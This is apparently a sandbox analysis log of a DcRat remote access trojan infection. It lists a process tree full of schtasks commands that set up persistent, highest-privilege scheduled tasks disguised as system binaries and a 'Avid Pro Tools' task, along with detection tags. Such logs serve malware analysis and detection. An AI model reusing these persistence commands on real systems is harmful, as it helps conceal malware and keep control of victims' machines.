- Scheduled Task/Job: Scheduled Task
PID:5356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6040
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:6440
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6220
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6576
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1240
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2508
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5360
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4776
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4892
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6936
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6368
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6692
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5336
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6756
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1456
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4828
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5160
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3720
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5816
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4976
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6372
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:5848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7012
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2128
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:3876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5656
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:7104
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6752
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:7148
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1228
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2348
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5204
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3824
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4700
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding D65C21151CFAD8EA15E1C659DA8D6DC62⤵
- Loads dropped DLL
PID:3592
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5BA32F3C6927AC0EC167C8219E7066922⤵
- Loads dropped DLL
PID:4396
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "faildsfsdf" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4188
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
PID:544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
PID:4160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:60
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\Cursors\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:3400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\winNet\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:4364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\winNet\Refcrt.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 10 /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /f1⤵
- Process spawned unexpected child process
PID:1776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
